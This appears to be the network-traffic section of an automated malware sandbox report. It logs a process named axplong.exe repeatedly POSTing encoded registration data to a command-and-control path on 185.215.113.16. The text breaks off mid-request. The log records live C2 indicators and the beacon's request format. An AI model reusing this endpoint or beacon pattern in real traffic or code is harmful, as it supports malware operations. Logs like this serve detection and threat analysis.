                                                                    Sep 27, 2024 19:06:04.526449919 CEST6281480192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:04.531280041 CEST8062814185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:04.531364918 CEST6281480192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:04.531445026 CEST8062813185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:04.531496048 CEST6281380192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:04.531641006 CEST6281480192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:04.536448956 CEST8062814185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:05.255327940 CEST8062814185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:05.255389929 CEST6281480192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:05.371669054 CEST6281480192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:05.372046947 CEST6281580192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:05.377795935 CEST8062815185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:05.377859116 CEST6281580192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:05.378062010 CEST6281580192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:05.379738092 CEST8062814185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:05.379787922 CEST6281480192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:05.383605003 CEST8062815185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:06.108616114 CEST8062815185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:06.111844063 CEST6281580192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:06.803221941 CEST6281580192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:06.808178902 CEST8062815185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:07.038024902 CEST8062815185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:07.038142920 CEST6281580192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:07.152688980 CEST6281580192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:07.152981043 CEST6281680192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:07.158607960 CEST8062815185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:07.158864021 CEST6281580192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:07.158865929 CEST8062816185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:07.158926010 CEST6281680192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:07.159190893 CEST6281680192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:07.164413929 CEST8062816185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:07.860096931 CEST8062816185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:07.862162113 CEST6281680192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:07.864720106 CEST6281680192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:07.865041018 CEST6281780192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:07.869894981 CEST8062816185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:07.870202065 CEST8062817185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:07.870280981 CEST6281680192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:07.870304108 CEST6281780192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:07.870531082 CEST6281780192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:07.875282049 CEST8062817185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:08.576803923 CEST8062817185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:08.576864958 CEST6281780192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:08.683619976 CEST6281780192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:08.683954000 CEST6281880192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:08.688884020 CEST8062818185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:08.689321995 CEST8062817185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:08.689408064 CEST6281780192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:08.689450026 CEST6281880192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:08.689546108 CEST6281880192.168.2.4185.215.113.16
                                                                    Sep 27, 2024 19:06:08.694675922 CEST8062818185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:09.412343979 CEST8062818185.215.113.16192.168.2.4
                                                                    Sep 27, 2024 19:06:09.412664890 CEST6281880192.168.2.4185.215.113.16
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Sep 27, 2024 19:04:35.501840115 CEST5352833162.159.36.2192.168.2.4
                                                                    Sep 27, 2024 19:04:36.026990891 CEST5797253192.168.2.41.1.1.1
                                                                    Sep 27, 2024 19:04:36.034615040 CEST53579721.1.1.1192.168.2.4
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Sep 27, 2024 19:04:36.026990891 CEST192.168.2.41.1.1.10x8889Standard query (0)241.42.69.40.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Sep 27, 2024 19:04:36.034615040 CEST1.1.1.1192.168.2.40x8889Name error (3)241.42.69.40.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                    • 185.215.113.16
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.462759185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:03.279798985 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:04.634599924 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:04.635782957 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:04.637388945 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:04.637726068 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:04.879264116 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.462760185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:04.999316931 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:05.719552994 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:05.720820904 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:05.949501038 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.462761185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:06.062747955 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:06.773173094 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:06.774979115 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:07.005067110 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.462762185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:07.124454021 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:07.845071077 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:07.845870972 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:08.076653004 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.462763185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:08.272320986 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:08.993936062 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:08.994999886 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:09.317238092 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.462764185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:09.437510967 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:10.163738012 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:10.164438963 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:10.399038076 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.462765185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:10.517086029 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:11.242234945 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:11.376559973 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:11.606090069 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.462766185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:11.719474077 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:12.437840939 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:12.440521002 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:12.671224117 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.462767185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:12.780961990 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:13.480228901 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:13.480870962 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
